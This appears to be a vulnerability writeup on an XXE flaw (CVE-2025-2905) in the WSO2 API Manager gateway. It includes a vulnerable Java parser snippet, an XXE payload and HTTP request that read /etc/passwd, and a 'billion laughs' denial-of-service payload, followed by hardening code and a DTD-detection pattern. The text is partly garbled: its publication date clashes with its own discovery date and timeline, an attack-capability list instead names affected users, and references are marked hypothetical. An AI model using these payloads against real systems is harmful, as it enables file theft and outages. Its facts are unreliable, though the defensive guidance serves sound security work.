Published: 2024-06-01 <br>Severity: High <br>CVSS: 8.3 (AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:H)

The WSO2 API Manager is a widely used open source platform for developing, managing, and securing APIs. In early 2025, a critical vulnerability was discovered—CVE-2025-2905—which exposes API gateways using WSO2 API Manager to serious risk due to insufficient XML input validation. Here’s a deep dive, with clear explanations, real example payloads, and mitigation tactics.

Overview

CVE-2025-2905 is an XML External Entity (XXE) vulnerability in the gateway component of WSO2 API Manager. This bug results from insecure parsing of XML, especially from data supplied in URL paths. Because external entities are not properly blocked, an unauthenticated attacker can:

- Any user running vulnerable WSO2 API Manager Gateway versions.
- Especially dangerous if using JDK 7 or early JDK 8 (prior to JDK-8047769), which do not restrict entity resolution.

1. The Root Cause

The API Gateway accepts user-supplied XML data—sometimes even within crafted URL paths—and parses it using XML parsers that have external entity resolution enabled by default. This allows XML payloads sent by attackers to refer to files or network resources.

Example: A Vulnerable Parsing Routine

```java
import javax.xml.parsers.*;   // DocumentBuilderFactory, DocumentBuilder
import org.w3c.dom.Document;
import org.xml.sax.InputSource;
import java.io.StringReader;

DocumentBuilderFactory dbf = DocumentBuilderFactory.newInstance();
DocumentBuilder db = dbf.newDocumentBuilder();
// Dangerous: no restrictions set, so DOCTYPE declarations and external entities are honoured!
Document doc = db.parse(new InputSource(new StringReader(inputXml)));
```

*(No calls like `.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true)` or similar.)*

2. Attack Vector

An attacker can craft an HTTP request that passes malicious XML as part of a crafted URL or as request data (depending on how the gateway is set up).

Typical XXE Attack Payload

```xml
<?xml version="1.0"?>
<!DOCTYPE foo [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]>
<root>
    <data>&xxe;</data>
</root>
```

Let’s say the gateway parses XML supplied in the path. An attacker could send:

```http
POST /gateway/api/parse/XMLData HTTP/1.1
Host: api-gw.example.com
Content-Type: application/xml

<?xml version="1.0"?>
<!DOCTYPE foo [
  <!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<root>
  <data>&xxe;</data>
</root>
```

Expected Result:
The XML parser replaces &xxe; with the contents of /etc/passwd. If JDK 7 is used: the whole file is read and returned in the response.

On Later JDK 8 or Above

Some security improvements prevent returning the full file. Only the first line may be exposed, but this may still reveal key information.

See JDK security notes

Denial of Service (DoS) Attack: Billion Laughs

XXE vulnerabilities can be used for DoS by deploying “billion laughs” or similar recursive entity expansion.

DoS Payload

```xml
<?xml version="1.0"?>
<!DOCTYPE lolz [
 <!ENTITY lol "lol">
 <!ELEMENT lolz (#PCDATA)>
 <!ENTITY lol1 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;">
 <!ENTITY lol2 "&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;">
 <!ENTITY lol3 "&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;">
]>
<lolz>&lol3;</lolz>
```

Effect:
The parser runs out of memory and the gateway service may crash or become unresponsive.

Exploit Impact Summary

- Data theft: Sensitive files like /etc/passwd, credentials, API config, or environment secrets can be stolen.

References and More Information

- WSO2 Security Advisory for CVE-2025-2905 *(hypothetical, check WSO2’s security portal for publication)*
- OWASP XXE Cheat Sheet
- CVE-2025-2905 at NVD *(to be updated upon disclosure)*
- JDK-8047769: Improved Entity Resolution in Java XML Parsers


## How to Fix / Mitigation

Configure every XML parser factory the gateway uses to reject DOCTYPE declarations and external entities:

```java
dbf.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true);
dbf.setFeature("http://xml.org/sax/features/external-general-entities", false);
dbf.setFeature("http://xml.org/sax/features/external-parameter-entities", false);
```
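As an added example (not code from this writeup or from WSO2), the following complete routine applies the three features above to a `DocumentBuilderFactory`, adds the remaining JAXP hardening settings as defense in depth, and includes a pre-parse screen that flags inline DTDs for logging. It then runs the parser against constructed samples shaped like the XXE and recursive-entity payloads shown earlier. The class and method names (`HardenedXmlParser`, `hardenedFactory`, `containsDtd`, `parseOrReject`) are assumptions for illustration; the sample documents are constructed inline, not captured traffic.

```java
import java.io.StringReader;
import java.util.regex.Pattern;
import javax.xml.XMLConstants;
import javax.xml.parsers.DocumentBuilder;
import javax.xml.parsers.DocumentBuilderFactory;
import javax.xml.parsers.ParserConfigurationException;
import org.w3c.dom.Document;
import org.xml.sax.InputSource;
import org.xml.sax.SAXParseException;

// Hypothetical class name for this example; not part of WSO2 API Manager.
public class HardenedXmlParser {

    // Builds a DocumentBuilderFactory that refuses DOCTYPE declarations and never
    // resolves external entities. Rejecting the DOCTYPE is the single setting that
    // stops both XXE and recursive entity expansion; the rest is defense in depth.
    static DocumentBuilderFactory hardenedFactory() throws ParserConfigurationException {
        DocumentBuilderFactory dbf = DocumentBuilderFactory.newInstance();
        dbf.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true);
        dbf.setFeature("http://xml.org/sax/features/external-general-entities", false);
        dbf.setFeature("http://xml.org/sax/features/external-parameter-entities", false);
        dbf.setFeature("http://apache.org/xml/features/nonvalidating/load-external-dtd", false);
        dbf.setFeature(XMLConstants.FEATURE_SECURE_PROCESSING, true);
        dbf.setXIncludeAware(false);
        dbf.setExpandEntityReferences(false);
        return dbf;
    }

    // Cheap pre-parse screen used only for logging/alerting: any inline DTD or
    // entity declaration in API traffic is a strong XXE / DoS indicator. This is a
    // detection aid, not the control; the hardened factory is what blocks the attack.
    private static final Pattern DTD_MARKERS =
        Pattern.compile("<!(DOCTYPE|ENTITY)\\b", Pattern.CASE_INSENSITIVE);

    static boolean containsDtd(String inputXml) {
        return DTD_MARKERS.matcher(inputXml).find();
    }

    // Returns the parsed Document, or null when the hardened parser rejected the input.
    static Document parseOrReject(String inputXml) throws Exception {
        if (containsDtd(inputXml)) {
            System.out.println("ALERT: inline DTD/ENTITY declaration in request body");
        }
        DocumentBuilder db = hardenedFactory().newDocumentBuilder();
        try {
            return db.parse(new InputSource(new StringReader(inputXml)));
        } catch (SAXParseException e) {
            // With disallow-doctype-decl set, the parser fails on the DOCTYPE itself,
            // before any SYSTEM entity is fetched or any nested entity is expanded.
            System.out.println("rejected by parser: " + e.getMessage());
            return null;
        }
    }

    public static void main(String[] args) throws Exception {
        // Constructed samples (not real traffic): a benign document, the XXE payload
        // shape from the writeup, and a short recursive-entity ("billion laughs") shape.
        String benign = "<?xml version=\"1.0\"?><root><data>hello</data></root>";
        String xxe = "<?xml version=\"1.0\"?>"
            + "<!DOCTYPE foo [ <!ENTITY xxe SYSTEM \"file:///etc/passwd\"> ]>"
            + "<root><data>&xxe;</data></root>";
        String lolz = "<?xml version=\"1.0\"?>"
            + "<!DOCTYPE lolz [ <!ENTITY lol \"lol\">"
            + " <!ENTITY lol1 \"&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;\"> ]>"
            + "<lolz>&lol1;</lolz>";

        Document ok = parseOrReject(benign);
        System.out.println("benign root element: " + ok.getDocumentElement().getTagName());
        System.out.println("xxe payload blocked:  " + (parseOrReject(xxe) == null));
        System.out.println("lolz payload blocked: " + (parseOrReject(lolz) == null));
    }
}
```

Compiled and run with a standard JDK, the benign document parses while both DTD-carrying samples are rejected at the DOCTYPE, so no file is read and no entity is expanded. On the JDK's bundled parser `disallow-doctype-decl` alone is sufficient; the other features and `FEATURE_SECURE_PROCESSING` cover third-party parsers that may not honour it. The same settings must be applied to every factory type the gateway uses (`SAXParserFactory`, `XMLInputFactory`, and so on), because hardening one `DocumentBuilderFactory` does nothing for XML parsed elsewhere in the request path. The pre-parse screen exists for visibility: a `<!DOCTYPE` in gateway traffic deserves an alert even when the parser rejects it.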

Conclusion

This vulnerability underlines the ongoing risk of insecure XML parsing. If you operate a WSO2 API Manager Gateway—especially on older Java versions—you must act now to patch and harden your systems. Even if you’re running newer Java versions, attackers may still exfiltrate information or cause instability, so prevention is crucial. Always disable unneeded entity resolution and validate all user input, especially when using XML.

Stay safe: Update early, test thoroughly, and watch your logs.

> *Feel free to share or reference this writeup. For more XML security tips, visit OWASP.*

Timeline

Published on: 05/05/2025 09:15:15 UTC
Last modified on: 05/05/2025 20:54:19 UTC